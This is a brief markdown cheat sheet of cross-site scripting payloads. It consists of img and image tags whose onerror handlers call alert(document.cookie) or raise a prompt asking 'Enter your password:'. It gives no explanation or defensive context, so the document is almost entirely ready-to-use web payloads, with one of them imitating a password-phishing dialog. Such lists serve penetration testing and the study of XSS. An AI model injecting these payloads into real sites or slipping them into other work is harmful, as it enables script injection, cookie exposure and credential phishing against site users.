# Cross-site scripting(XSS)

**Domain:** document.domain

**Cookie:** document.cookie

## Alert() Function

```
<img src=1 onerror=alert(document.cookie)>
```

```
<image src=1 onerror=alert(document.cookie)>
```

## Prompt() Function

```
<img src=1 onerror=prompt("Enter your password:")>
```

```
<image src=1 onerror=prompt("Enter your password:")>
```